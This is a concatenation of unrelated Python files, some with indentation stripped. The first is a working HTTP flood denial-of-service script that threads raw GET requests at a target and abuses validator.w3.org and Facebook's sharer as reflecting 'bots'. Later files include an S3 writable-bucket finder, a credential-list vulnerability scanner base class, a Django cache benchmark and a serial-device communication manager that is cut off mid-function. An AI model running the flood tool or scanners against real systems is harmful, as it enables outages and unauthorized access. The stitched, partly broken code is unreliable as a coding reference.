def my_bots():
global bots
bots=[]
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
return(bots)
def bot_hammering(url):
try:
while True:
req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
print("\033[94mbot is hammering...\033[0m")
time.sleep(.1)
except:
time.sleep(.1)
def down_it(item):
try:
while True:
packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
if s.sendto( packet, (host, int(port)) ):
s.shutdown(1)
print ("\033[0m \033[35m [PACKET SENT TO HOST] ==> \033[31m",host,'\033[35m [FLOODING PORT] ==> \033[31m', port)
else:
s.shutdown(1)
print("\033[31m shut<->down\033[0m")
time.sleep(.1)
except socket.error as e:
print("\033[31m NO CONNECTION TO HOST [!] SERVER PWNED \033[0m")
#print("\033[91m",e,"\033[0m")
time.sleep(.1)
def dos():
while True:
item = q.get()
down_it(item)
q.task_done()
def dos2():
while True:
item=w.get()
bot_hammering(random.choice(bots)+"http://"+host)
w.task_done()
def usage():
print ('''\n
\033[31m
usage : python3 saph.py -s [server IPA] -p [Servers Port] -t [Threads]
-h : help/usage
-s : server ip
-p : port default 80
-t : turbo default 135 \033[0m''')
sys.exit()
def get_parameters():
global host
global port
global thr
global item
optp = OptionParser(add_help_option=False,epilog="Hammers")
optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
opts, args = optp.parse_args()
logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
if opts.help:
usage()
if opts.host is not None:
host = opts.host
else:
usage()
if opts.port is None:
port = 80
else:
port = opts.port
if opts.turbo is None:
thr = 135
else:
thr = opts.turbo
# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
q = Queue()
w = Queue()
if __name__ == '__main__':
if len(sys.argv) < 2:
usage()
get_parameters()
print("\033[92m [DATA] [ATTACKING] ===>",host," [ON PORT] ==> ",str(port)," [WITH THREADS] ==> ",str(thr),"\033[0m")
print("\033[94m Initating Attack...\033[0m")
user_agent()
my_bots()
time.sleep(5)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(port)))
s.settimeout(1)
except socket.error as e:
print("\033[31m [!] CANT CREAT A CONNECTION BETWEEN HOST, CHECK AGAIN[!] \033[0m")
usage()
while True:
for i in range(int(thr)):
t = threading.Thread(target=dos)
t.daemon = True
t.start()
t2 = threading.Thread(target=dos2)
t2.daemon = True
t2.start()
start = time.time()
item = 0
while True:
if (item>1800):
item=0
time.sleep(.1)
item = item + 1
q.put(item)
w.put(item)
q.join()
w.join()
|
find_s3_writable_buckets.py |
#!/usr/bin/env python3
from lib.constants import *
from lib.logger import *
from lib.traceback import *
from lib.progressbar import *
from lib.get_subpages import Page, get_subpages, get_source_code, get_domain
from module.test_upload import *
from module.find_s3_writable_buckets_constants import *
import datetime
import time
import multiprocessing
import queue
import requests
import urllib3
import http
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from bs4 import BeautifulSoup
import re
try:
from urllib import urlopen
except:
from urllib.request import urlopen
import threading
import time
sleep_between_checks = .1
def find_writable_buckets(urls, max_subpages=50): #main method
try:
logger.log.critical("Checking for write-enabled or non-existant S3 buckets")
vulns_found = [] #Store all vulns found
pool_size = multiprocessing.cpu_count() * 2
pool = multiprocessing.Pool(processes=pool_size)
active_processes = [] #Store the processes until they are done
for url in urls:
active_processes.append(pool.apply_async(check_for_writable_buckets, (url.strip(), max_subpages)))
#Give a progressbar as the active_processes come in
num_items = len(urls)
progress = ProgressBar(num_items=len(urls))
while progress.cur_item < num_items or active_processes:
for active_process in active_processes:
if active_process.ready():
if active_process._value:
vulns_found.extend(active_process._value)
active_processes.remove(active_process)
progress(num_completed=1)
progress(num_completed=0)
time.sleep(1)
#Everything's done!
progress.done()
pool.close()
pool.join()
logger.log.critical("Done checking for write-enabled or non-existant S3 buckets")
return vulns_found
except:
logger.log.critical("Exception %s" % (get_exception().replace("\n", " ")))
return []
def check_for_writable_buckets(url, max_subpages):
try:
# logger.log.warning("Checking %s" % (url))
start_time = time.time()
vulns_found = []
threads = []
#Create the first page and set it up to store other page's buckets
page = Page(url=url)
page.source_code = get_source_code(page=page, include_js=True)
page.buckets_dict = {}
page.js_links_found = []
#Get subpages
get_subpages(page=page, max_subpages=max_subpages)
#Run the base page
t = threading.Thread(target=run_website, args=(page, page,))
threads.append(t)
t.start()
for subpage in page.subpages:
t = threading.Thread(target=run_website, args=(page, subpage,))
threads.append(t)
t.start()
#Pause if at max length
while len(threads) >= max_subpages:
time.sleep(sleep_between_checks)
for thread in threads:
if not thread.isAlive():
threads.remove(thread)
#Wait for all threads to finish.
while threads:
#Remove finished thraeds
for thread in threads:
if not thread.isAlive():
threads.remove(thread)
time.sleep(sleep_between_checks)
#Compile buckets
buckets_with_website = []
for vuln_url, buckets in page.buckets_dict.items():
for bucket in buckets:
if not any(existing_bucket == bucket for vuln_url, existing_bucket in buckets_with_website):
buckets_with_website.append((vuln_url, bucket))
#Run buckets
if buckets_with_website:
logger.log.warning("Running potential buckets for %s: %s" % (url, buckets_with_website))
for bucket_with_website in buckets_with_website:
vuln = test_upload(url, bucket_with_website)
if vuln:
vulns_found.append(vuln)
#log the URL as searched
add_searched_site(url)
# logger.log.warning("Finished %s in %s sec" % (url, (int(time.time()) - start_time)))
return vulns_found
except:
logger.log.critical("Exception on %s: %s" % (url, get_exception().replace("\n", " ")))
return []
def add_searched_site(url):
with open("%s/searched_sites.txt" % (list_dir), "a") as f:
f.write(get_domain(url)+"\n")
def run_website(page, subpage):
try:
if subpage.source_code:
#Reformat the source code to make S3 link extraction easier
subpage.source_code = reformat_s3_links(subpage.source_code)
find_buckets(page, subpage.url, subpage.source_code)
#Get links from any javascript on the pages as well
new_js_links = get_js_links(page, subpage.url, subpage.source_code)
# if new_js_links:
# logger.log.warning("%s JS links found on %s" % (len(new_js_links), subpage.url))
for new_js_link in new_js_links:
p = Page(url=new_js_link)
source_code = get_source_code(p, include_js=True)
source_code = reformat_s3_links(source_code)
find_buckets(page, new_js_link, source_code)
except:
logger.log.critical("Exception on %s: %s" % (subpage.url, get_exception().replace("\n", " ")))
def find_buckets(page, url, source_code):
try:
#Be sure it's not an ELB or other amazonaws link
if "s3.amazonaws.com" not in source_code:
return
else:
# logger.log.critical("%s - amazonaws found...Checking for buckets in source code." % (url))
bucket_names = []
good_bucket_names = []
bad_bucket_names = []
#Pull out all possible buckets
bucket_names = extract_bucket_names(source_code)
for bucket_name in list(set(bucket_names)):
bucket_name = bucket_name.strip()
#See if it got too much data from an earlier "//" string
if "//" in bucket_name:
bucket_name = bucket_name.split("//")[len(bucket_name.split("//"))-1]
#Add the bucket if it looks valid, checking if it is in the source code (e.g. no replacing messed it up)
if bucket_name in source_code:
if not any(bad_bucket_name_content in bucket_name for bad_bucket_name_content in bad_bucket_name_contents):
if len(bucket_name) <= max_bucket_len and len(bucket_name) >= 3:
if bucket_name in junk_buckets:
bad_bucket_names.append(bucket_name)
elif "elasticbeanstalk-" in bucket_name:
bad_bucket_names.append(bucket_name)
elif "blacklist" in url:
bad_bucket_names.append(bucket_name)
else:
good_bucket_names.append(bucket_name)
#Return unique bucket names
good_bucket_names = list(set(good_bucket_names))
page.buckets_dict[url] = good_bucket_names
except:
logger.log.critical("Exception %s" % (get_exception().replace("\n", " ")))
def reformat_s3_links(source_code):
#Remove DNS prefetch...
source_code = source_code.replace("rel='dns-prefetch' href='//s3.amazonaws.com'", "")
source_code = source_code.replace("rel='dns-prefetch' href='s3.amazonaws.com'", "")
source_code = source_code.replace("rel='dns-prefetch' href='http://s3.amazonaws.com", "")
source_code = source_code.replace("rel='dns-prefetch' href='https://s3.amazonaws.com", "")
source_code = source_code.replace('rel="dns-prefetch" href="//s3.amazonaws.com"', '')
source_code = source_code.replace('rel="dns-prefetch" href="s3.amazonaws.com"', '')
source_code = source_code.replace('rel="dns-prefetch" href="http://s3.amazonaws.com', "")
source_code = source_code.replace('rel="dns-prefetch" href="https://s3.amazonaws.com', "")
#Remove region names so you don't have to worry about them in the regex
source_code = source_code.replace(":80", "")
source_code = source_code.replace(":8080", "")
source_code = source_code.replace(":8000", "")
source_code = source_code.replace(":443", "")
source_code = source_code.replace("-us-east-2", "")
source_code = source_code.replace("-us-east-1", "")
source_code = source_code.replace("-us-west-2", "")
source_code = source_code.replace("-us-west-1", "")
source_code = source_code.replace("-ap-south-1", "")
source_code = source_code.replace("-ap-northeast-1", "")
source_code = source_code.replace("-ap-northeast-2", "")
source_code = source_code.replace("-ap-northeast-3", "")
source_code = source_code.replace("-ap-southeast-1", "")
source_code = source_code.replace("-ap-southeast-2", "")
source_code = source_code.replace("-ca-central-1", "")
source_code = source_code.replace("-cn-north-1", "")
source_code = source_code.replace("-eu-central-1", "")
source_code = source_code.replace("-eu-west-1", "")
source_code = source_code.replace("-eu-west-2", "")
source_code = source_code.replace("-eu-west-3", "")
source_code = source_code.replace("-sa-east-1", "")
#Replace some of the html encoding
source_code = str(source_code.replace("\/","/").replace("') + '", "").replace('") + "', ''))
return source_code
def extract_bucket_names(source_code):
try:
bucket_names = []
search_string = "s3.amazonaws.com"
first_chars = [match.start() for match in re.finditer(re.escape(search_string), source_code)]
for first_char in first_chars:
start_index = (first_char-max_bucket_len) if (first_char-max_bucket_len) >=0 else 0
end_index = first_char+max_bucket_len
#Get subdomain strings
bucket_names_subdomain = re.findall(r'''[\/'" ]([a-zA-Z0-9\.\-\_]{3,63})\.s3\.amazonaws\.com''', source_code[start_index:first_char+len(search_string)])
#Be sure you've got the bucket name as the regex will take the first instance of the optional char
for bucket_name in bucket_names_subdomain:
# print(bucket_name)
bucket_name = bucket_name.strip()
for c in ("/", "'", '"', " "):
if str(c) in str(bucket_name):
bucket_name = bucket_name.split(c)[len(bucket_name.split(c))-1]
bucket_names.append(bucket_name)
#Get subfolder strings
bucket_names_subfolder = re.findall(r'''[^.]s3\.amazonaws\.com\/([a-zA-Z0-9\.\-\_]{3,63})[\/'" ]''', source_code[first_char-1:end_index])
#Be sure you've got the bucket name as the regex will take the last instance of the optional char
for bucket_name in bucket_names_subfolder:
# print(bucket_name)
bucket_name = bucket_name.strip()
for c in ("/", "'", '"', " "):
if c in bucket_name:
bucket_name.split(c)[0]
bucket_names.append(bucket_name)
return bucket_names
except:
logger.log.critical("Error extracting names: %s" % (get_exception().replace("\n", " ")))
def get_js_links(page, url, source_code):
# logger.log.warning("Checking for js on %s" % (url))
#Get all links
try:
bsObj = BeautifulSoup(source_code, "html.parser")
except:
logger.log.warning("Error parsing source code: %s" % (get_exception().replace("\n", " ")))
return []
new_js_links = []
try:
js_links = [i.get('src') for i in bsObj.find_all('script') if i.get('src')]
for js_link in js_links:
#See if it's an external lnk
if js_link[0] == "/" and js_link[1] == "/":
js_link = js_link[2::]
if js_link not in page.js_links_found:
page.js_links_found.append(js_link)
new_js_links.append(js_link)
#Strip it of http/https just to clean it up
else:
if "http" not in js_link:
#Just try it as is, e.g. if it's "somedomain.com/js/file.js" Just be sure it's not a /.....
if js_link not in page.js_links_found:
if js_link[0] != "/":
page.js_links_found.append(js_link)
new_js_links.append(js_link)
#Also try it with the current domain, e.g. if it's "js/file.js"
if page.domain not in js_link:
if js_link[0] == "/":
js_link = "%s%s" % (page.domain, js_link)
else:
js_link = "%s/%s" % (page.domain, js_link)
if js_link not in page.js_links_found:
page.js_links_found.append(js_link)
new_js_links.append(js_link)
#Just be sure it's in there in some way...
if js_link not in page.js_links_found:
page.js_links_found.append(js_link)
new_js_links.append(js_link)
return new_js_links
except:
logger.log.critical("Error parsing source code: %s" % (get_exception().replace("\n", " ")))
return new_js_links
def is_ok_error(e):
try:
for ok_error in ok_errors:
if str(ok_error) in str(e):
return True
return False
except:
logger.log.critical("Exception %s" % (get_exception().replace("\n", " ")))
|
benchmark_djangocache.py | """Benchmark diskcache.DjangoCache
$ export PYTHONPATH=/Users/grantj/repos/python-diskcache
$ python tests/benchmark_djangocache.py > tests/timings_djangocache.txt
"""
import collections as co
import multiprocessing as mp
import os
import pickle
import random
import shutil
import time
from utils import display
PROCS = 8
OPS = int(1e5)
RANGE = int(1.1e3)
WARMUP = int(1e3)
def setup():
    """Point Django at the benchmark settings module and initialize it.

    setdefault keeps an explicitly exported DJANGO_SETTINGS_MODULE intact,
    so the benchmark can be run against alternative settings.
    """
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tests.settings_benchmark')
    import django
    django.setup()
def worker(num, name):
    """Benchmark process body: run OPS random cache ops, pickle the timings.

    Args:
        num: Worker index; seeds the RNG and names the output pickle file.
        name: Django cache alias to exercise.
    """
    setup()
    from django.core.cache import caches
    obj = caches[name]
    random.seed(num)
    timings = co.defaultdict(list)
    time.sleep(0.01)  # Let other processes start.
    for count in range(OPS):
        key = str(random.randrange(RANGE)).encode('utf-8')
        value = str(count).encode('utf-8') * random.randrange(1, 100)
        choice = random.random()
        # Operation mix: 90% get, 9% set, 1% delete.
        if choice < 0.900:
            start = time.time()
            result = obj.get(key)
            end = time.time()
            miss = result is None
            action = 'get'
        elif choice < 0.990:
            start = time.time()
            result = obj.set(key, value)
            end = time.time()
            # NOTE(review): many backends return None from set(), so this
            # miss test may never fire — confirm per backend.
            miss = result is False
            action = 'set'
        else:
            start = time.time()
            result = obj.delete(key)
            end = time.time()
            miss = result is False
            action = 'delete'
        # Skip the first WARMUP iterations to exclude cold-start noise.
        if count > WARMUP:
            delta = end - start
            timings[action].append(delta)
            if miss:
                timings[action + '-miss'].append(delta)
    # Dump this worker's timings for dispatch() to merge.
    with open('output-%d.pkl' % num, 'wb') as writer:
        pickle.dump(timings, writer, protocol=pickle.HIGHEST_PROTOCOL)
def prepare(name):
    """Warm the named Django cache with every key in RANGE before timing."""
    setup()
    from django.core.cache import caches
    cache = caches[name]
    for i in range(RANGE):
        encoded = str(i).encode('utf-8')
        cache.set(encoded, encoded)
    try:
        cache.close()
    except Exception:
        # Some backends expose no close(); best effort only.
        pass
def dispatch():
    """Run the benchmark against each cache backend and display results.

    For each backend: wipe the on-disk cache dir, pre-populate it in a
    child process, fan out PROCS workers, then merge their pickled timings.
    """
    setup()
    from django.core.cache import caches  # noqa
    for name in ['locmem', 'memcached', 'redis', 'diskcache', 'filebased']:
        shutil.rmtree('tmp', ignore_errors=True)
        # Prepare in a subprocess so each backend starts from a clean slate.
        preparer = mp.Process(target=prepare, args=(name,))
        preparer.start()
        preparer.join()
        processes = [
            mp.Process(target=worker, args=(value, name))
            for value in range(PROCS)
        ]
        for process in processes:
            process.start()
        for process in processes:
            process.join()
        # Merge the per-worker timing pickles, deleting each as it is read.
        timings = co.defaultdict(list)
        for num in range(PROCS):
            filename = 'output-%d.pkl' % num
            with open(filename, 'rb') as reader:
                output = pickle.load(reader)
            for key in output:
                timings[key].extend(output[key])
            os.remove(filename)
        display(name, timings)
if __name__ == '__main__':
    import argparse

    # Command-line overrides for the module-level benchmark constants.
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    parser.add_argument('-p', '--processes', type=int, default=PROCS,
                        help='Number of processes to start')
    parser.add_argument('-n', '--operations', type=float, default=OPS,
                        help='Number of operations to perform')
    parser.add_argument('-r', '--range', type=int, default=RANGE,
                        help='Range of keys')
    parser.add_argument('-w', '--warmup', type=float, default=WARMUP,
                        help='Number of warmup operations before timings')
    args = parser.parse_args()

    PROCS = int(args.processes)
    OPS = int(args.operations)
    RANGE = int(args.range)
    WARMUP = int(args.warmup)

    dispatch()
|
VulnerableScanningEngine.py | # Base Class For Vulnerable Scanning Engine
import threading
from tqdm import tqdm
from Configuration.Configuration import APP_CONFIGURATION
class ScanningThreadPool:
def __init__(self, maxsize):
self.maxsize = maxsize
self.thread_dict = {}
self.container = 0
def thread_function(self, execute, name):
def function(*args):
execute(*args)
del self.thread_dict[name]
return function
def start_new_thread(self, function, args):
while True:
if len(self.thread_dict.keys()) < self.maxsize:
name = "Thread%s" % str(self.container)
self.container += 1
self.thread_dict[name] = threading.Thread(target=self.thread_function(function, name), args=(args))
self.thread_dict[name].start()
# self.thread_dict[name].join()
break
else:
continue
def show_size(self):
tqdm.write(self.maxsize)
def show_status(self):
for key in self.thread_dict.keys():
tqdm.write("Thread: " + self.thread_dict[key] + " : " + self.thread_dict[key].is_alive())
class VulnerableScannerBaseClass:
def __init__(self, target):
self.target = target # target = "target://ip:port:protocol"
if self.target.find(",") >= 0:
self.target = self.target.split(",")
for item in self.target:
if item == "":
self.target.remove(item)
if isinstance(self.target, str):
self.target = [self.target]
self.thread_pool = ScanningThreadPool(APP_CONFIGURATION["ThreadCount"])
self.username_list = [username.split("\n")[0] for username in
open(APP_CONFIGURATION["UsernameFile"], "r").readlines()]
self.password_list = [password.split("\n")[0] for password in
open(APP_CONFIGURATION["PasswordFile"], "r").readlines()]
self.size = len(self.target)
self.percent = tqdm
self.header = APP_CONFIGURATION["Header"]
def target_tuple(self):
_list = []
for target in self.target:
content = target.split("://")[1]
ipaddress, port, protocol = content.split(":")
_list.append((ipaddress, port, protocol))
self.size = len(_list)
return _list
def ScannerRegister(name, clazz):
APP_CONFIGURATION["VulnerableDictionary"][name] = clazz
|
send_cmd.py | """
Manage communications between the PC and the device.
Requirements:
* pyserial
* continuous_threading
"""
import sys
import time
import serial
import functools
import contextlib
import continuous_threading
from pybk8500.parser import Parser
__all__ = ['CommunicationManager', 'send_msg', 'main']
def pop_messages(msg_list, msg_type=None):
    """Yield each matching message while removing it from the list in place.

    Args:
        msg_list (list): Parsed messages; matching entries are deleted as
            they are yielded.
        msg_type (type)[None]: Message class to match. None matches (and
            removes) every message.
    """
    idx = 0
    for _ in range(len(msg_list)):
        msg = msg_list[idx]
        if msg_type is None or isinstance(msg, msg_type):
            yield msg
            # Remove the yielded message; the next item slides into idx.
            del msg_list[idx]
        else:
            idx += 1
class CommunicationManager(object):
    """Manage communications between the PC and the device over serial."""

    Parser = Parser      # parser class instantiated when none is supplied
    read_rate = 1/30     # serial read timeout in seconds (class-level default)
    read_size = 4096     # bytes per read; <= 0 means "whatever is waiting"
def __init__(self, connection=None, parser=None, com=None, baudrate=None, **kwargs):
    """Create the communication manager.

    Args:
        connection (object)[None]: Serial-like connection (default: serial.Serial()).
        parser (object)[None]: Message parser (default: self.Parser()).
        com (str)[None]: COM port to set on the connection.
        baudrate (int)[None]: Baudrate to set on the connection.
        **kwargs: Extra attributes set directly on the instance
            (e.g. read_rate, read_size, read_delay, wait_delay).
    """
    super().__init__()
    if parser is None:
        parser = self.Parser()
    if connection is None:
        connection = serial.Serial()
        # connection.rts = True # Documentation states needed. Did not work
        # connection.dtr = True # Documentation states needed. Did not work
    self._parser = None
    self._process = None
    self._in_enter = False
    self._enter_started = False
    self._enter_connected = False
    # Copy the class-level defaults so instances can be tuned independently.
    self.read_rate = self.__class__.read_rate
    self.read_size = self.__class__.read_size
    self.read_delay = 0.0001
    self.wait_delay = 0.01
    for k, v in kwargs.items():
        setattr(self, k, v)
    # Messages collected by save_ack(); always accessed under ack_lock.
    self.ack_lock = continuous_threading.RLock()
    self.ack_list = []
    self.response_types = []
    self.connection = connection
    # Apply port settings before installing the parser.
    if baudrate is not None:
        self.set_baudrate(baudrate)
    if com is not None:
        self.set_com(com)
    self.set_parser(parser)
def get_parser(self):
    """Return the parser."""
    return self._parser

def set_parser(self, parser):
    """Set the parser.

    Args:
        parser (object/None/Parser)[None]: Parser object to parse incoming messages.
    """
    self._parser = parser
    if self._parser is not None:
        # Route the parser's callbacks back into this manager.
        self._parser.message_parsed = self.message_parsed
        self._parser.error = self.error

parser = property(get_parser, set_parser)
def save_ack(self, msg):
    """Save the response messages in the available response_types."""
    # An empty response_types list means "save every message".
    if len(self.response_types) == 0 or any(isinstance(msg, rtype) for rtype in self.response_types):
        with self.ack_lock:
            self.ack_list.append(msg)

# Default parsed-message callback; swappable via change_message_parsed().
message_parsed = save_ack
@contextlib.contextmanager
def change_message_parsed(self, callback):
    """Temporarily replace the message_parsed callback within a with block.

    Args:
        callback (callable): Called as ``callback(msg)`` for each parsed
            message while inside the with block.
    """
    old = self.message_parsed
    self.message_parsed = callback
    try:
        yield
    finally:
        # Restore the previous callback even if the with-body raises;
        # without try/finally an exception would leave the temporary
        # callback installed permanently.
        self.message_parsed = old
@staticmethod
def error(error):
    """Callback to indicate that an error happened.

    Args:
        error (Exception): Optional error object if applicable (C parsers do not create error objects).
    """
    # Default handler: report on stderr without interrupting the read loop.
    print('{}: {}'.format(type(error).__name__, error), file=sys.stderr)
@contextlib.contextmanager
def change_connection(self):
    """Change the connection properties safely.

    Disconnects (if connected) so properties such as the port or
    baudrate can be modified, then restores the previous state.
    """
    is_connected = self.is_connected()
    if is_connected:
        self.disconnect()
    try:
        yield
    finally:
        # Reconnect even if changing a property raised, so a failed
        # change does not silently leave the port closed.
        if is_connected:
            self.connect()
def get_baudrate(self):
    """Return the baudrate."""
    return self.connection.baudrate

def set_baudrate(self, value, *args, **kwargs):
    """Set the baudrate (disconnecting/reconnecting around the change)."""
    with self.change_connection():
        self.connection.baudrate = value

def get_com(self):
    """Return the serial com port."""
    return self.connection.port

def set_com(self, value, *args, **kwargs):
    """Set the serial com port and try to connect."""
    with self.change_connection():
        self.connection.port = value

# Aliases: "port" and "com" name the same setting.
get_port = get_com
set_port = set_com
def get_rts(self):
    """Return if the RTS Hardware Flow Control is set."""
    try:
        return self.connection.rts
    except (AttributeError, Exception):
        # Connection type without RTS support.
        return False

def set_rts(self, value, *args, **kwargs):
    """Set the RTS Hardware Flow Control."""
    with self.change_connection():
        self.connection.rts = bool(value)

def get_dtr(self):
    """Return if the DTR Hardware Flow Control is set."""
    try:
        return self.connection.dtr
    except (AttributeError, Exception):
        # Connection type without DTR support.
        return False

def set_dtr(self, value, *args, **kwargs):
    """Set the DTR Hardware Flow Control."""
    with self.change_connection():
        self.connection.dtr = bool(value)
def is_connected(self):
    """Return whether the connection/serial port is currently open."""
    conn = self.connection
    if not isinstance(conn, serial.Serial):
        return False
    try:
        return conn.is_open
    except (AttributeError, Exception):
        return False
def connect(self, com=None, baudrate=None, **kwargs):
    """Connect the connection/serial port.

    Args:
        com (str)[None]: Optional port to apply before connecting.
        baudrate (int)[None]: Optional baudrate to apply before connecting.
    """
    # Changing settings requires a disconnect first.
    if com is not None or baudrate is not None:
        self.disconnect()
        if com is not None:
            self.connection.port = com
        if baudrate is not None:
            self.connection.baudrate = baudrate
    if not self.is_connected():
        # Drop any stale buffered data before opening.
        self.flush()
        if isinstance(self.connection, serial.Serial):
            # Use the read rate as the serial timeout so reads poll.
            self.connection.timeout = self.read_rate
            self.connection.open()
def disconnect(self, *args, **kwargs):
    """Disconnect the connection/serial port."""
    # Non-serial connection objects are left untouched.
    if isinstance(self.connection, serial.Serial):
        self.connection.close()
def flush(self):
    """Drop all queued ack messages and clear the connection's buffers."""
    with self.ack_lock:
        self.ack_list.clear()
    # Best effort: not every connection object implements these methods.
    for cleanup in ('flush', 'reset_input_buffer', 'reset_output_buffer'):
        try:
            getattr(self.connection, cleanup)()
        except (AttributeError, Exception):
            pass
def read(self):
    """Read available data from the serial connection (b'' otherwise)."""
    if not isinstance(self.connection, serial.Serial):
        return b''
    size = self.read_size
    # A missing or non-positive size means "read whatever is waiting".
    if size is None or size <= 0:
        size = self.connection.in_waiting
    return self.connection.read(size)
def write(self, byts):
    """Write the bytes (or message) data to the connection."""
    # bytes() lets message objects that implement __bytes__ be sent directly.
    return self.connection.write(bytes(byts))
def read_and_parse(self):
    """Read data from the connection and parse it."""
    try:
        if self.is_connected():
            byts = self.read()
            if byts:
                self.parser.parse(byts, self.message_parsed)
            # Small pause keeps the read loop from pegging a core.
            time.sleep(self.read_delay)
        else:
            # Not connected; back off longer before checking again.
            time.sleep(0.1)
    except (ConnectionAbortedError, SystemError, TimeoutError, RuntimeError, Exception) as err:
        # Report via the error callback instead of killing the read loop.
        self.error(err)
        # print(str(err), file=sys.stderr)
@contextlib.contextmanager
def listen_for_messages(self, *msg_types):
    """Context manager to listen for certain message types.

    Connects and starts the manager if needed, registers msg_types so
    save_ack() collects them, and restores the previous state on exit.
    """
    # Ensure connected and running
    is_connected = self.is_connected()
    is_running = self.is_running()
    if not is_connected:
        self.connect()
    if not is_running:
        self.start()
    # Start listening for responses
    for msg_type in msg_types:
        if msg_type is not None:
            self.response_types.append(msg_type)
    try:
        # Yield with block
        yield
    finally:
        # Remove message types
        for msg_type in msg_types:
            try:
                self.response_types.remove(msg_type)
            except (KeyError, IndexError, Exception):
                pass
        # If connected and/or started then stop and/or disconnect
        # (only undo the state changes this context manager made).
        if not is_running:
            self.stop()
        if not is_connected:
            self.disconnect()
@classmethod
def listener(cls, *msg_types, attr=None, func=None):
"""Decorator to have a function run with listen_for_messages"""
if func is None:
def decorator(f):
return cls.listener(*msg_types, func=f)
return decorator
@functools.wraps(func)
def wrapper(self, *args, **kwargs):
msg_mngr = self
if attr is not None:
msg_mngr = getattr(self, msg_mngr)
with msg_mngr.listen_for_messages(*msg_types):
return func(self, *args, **kwargs)
return wrapper
def has_msg_type(self, msg_type=None):
"""Return True if the given msg_type is saved in the ack_list. If None is given return True if any
message is in the ack_list.
"""
with self.ack_lock:
return (msg_type is None and len(self.ack_list) > 0) or \
any(isinstance(msg, msg_type) for msg in self.ack_list)
def wait_for_response(self, timeout, msg_type=None):
"""Wait for a response message and return True if a message was received.
Args:
timeout (float/int): Number of seconds to wait for a message.
msg_type (Message/object)[None]: Message type class to wait for.
Returns:
success (bool): True if a message was received within the timeout.
"""
start = time.time()
while (time.time() - start) < timeout and not self.has_msg_type(msg_type):
time.sleep(self.wait_delay)
return self.has_msg_type(msg_type)
    def send_wait(self, msg, timeout=0, msg_type=None, attempts=3, print_msg=True, print_recv=None):
        """Send a message and wait for a response.

        Args:
            msg (Message): Message to convert to bytes and send.
            timeout (float/int): Number of seconds to wait for a message on each attempt.
            msg_type (Message/object)[None]: Message type class to wait for.
            attempts (int)[3]: Number of attempts to send the message and wait for the response.
            print_msg (bool)[True]: If True print out that you are sending the message.
            print_recv (bool)[print_msg]: If True print all received messages.

        Returns:
            ack_list (list): List of received messages.

        Raises:
            TimeoutError: If no response arrived after all attempts and a
                positive timeout was given (with the default timeout of 0,
                a missing response is not an error).
        """
        if print_recv is None:
            print_recv = print_msg
        with self.listen_for_messages(msg_type):
            trials = 0
            success = False
            pout = 'Sending: {}'.format(msg)
            while (trials < attempts) and not success:
                if print_msg:
                    print(pout)
                self.write(msg)
                success = self.wait_for_response(timeout, msg_type=msg_type)
                pout = 'Sending (Retry): {}'.format(msg)
                trials += 1
            if not success and timeout > 0:
                raise TimeoutError('Attempts sending {} failed!'.format(msg))

        # Clear and return messages.  pop_messages is defined elsewhere in
        # this module; it yields the messages matching msg_type.
        with self.ack_lock:
            msgs = list(pop_messages(self.ack_list, msg_type))
            self.ack_list.clear()
        if print_recv:
            for msg in msgs:
                print('Received:', msg)
        return msgs

    # Backwards-compatible alias.
    send_wait_for_response = send_wait
def is_running(self):
"""Return if the reading thread is running."""
return self._process is not None and self._process.is_running()
    def start(self):
        """Start reading and parsing the connection.

        Creates the background thread on first use; subsequent calls
        restart it.  Returns self so calls can be chained.
        """
        if self._process is None:
            # The thread repeatedly invokes read_and_parse until stopped.
            self._process = continuous_threading.PausableThread(target=self.read_and_parse)
        self.flush()
        self._process.start()
        # Wait for the thread to start reading
        time.sleep(0.01)
        return self
def stop(self):
"""Stop reading and parsing the connection."""
try:
self._process.stop()
except (AttributeError, Exception):
pass
return self
    def close(self):
        """Disconnect and permanently shut down the reader thread.

        Returns self so calls can be chained.
        """
        self.disconnect()
        try:
            self._process.close()
        except (AttributeError, Exception):
            # No thread was ever started, or it is already closed.
            pass
        self._process = None
        return self
    def __enter__(self):
        """Enter the 'with' context manager.

        Connects (best effort; a failure only prints a warning) and
        starts the reader thread if they were not already active; the
        _enter_* flags let __exit__ undo exactly what was done here.
        """
        self._in_enter = True
        if not self.is_connected():
            try:
                self.connect()
                self._enter_connected = True
            except Exception as err:
                print('Warning: Could not connect! {}'.format(err), file=sys.stderr)
        if not self.is_running():
            self.start()
            self._enter_started = True
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        """Exit the 'with' context manager.

        Only undoes what __enter__ actually did (stop/disconnect).
        Returns True when no exception occurred; any exception raised
        inside the block propagates to the caller.
        """
        self._in_enter = False
        if self._enter_started:
            self._enter_started = False
            self.stop()
        if self._enter_connected:
            self._enter_connected = False
            self.disconnect()
        return exc_type is None
def send_msg(com, baudrate, cmd_id, timeout=1, attempts=1, **kwargs):
    """Send a command to the device.

    Args:
        com (str): Com port to connect to
        baudrate (int): Baudrate to connect with.
        cmd_id (int/str/Message): Command identifier to send.
        timeout (float/int)[1]: Timeout to wait for the response.
        attempts (int)[1]: Number of times to send the message expecting a response.
        **kwargs (dict): Dictionary of Command keyword arguments (variable names with values).

    Raises:
        ValueError: If cmd_id does not match any registered command.
    """
    cmd_type = Parser.lookup(cmd_id)
    if cmd_type is None:
        raise ValueError('Invalid cmd_id given! No matching command for {}'.format(cmd_id))
    cmd = cmd_type(**kwargs)
    with CommunicationManager(com=com, baudrate=baudrate) as ser:
        try:
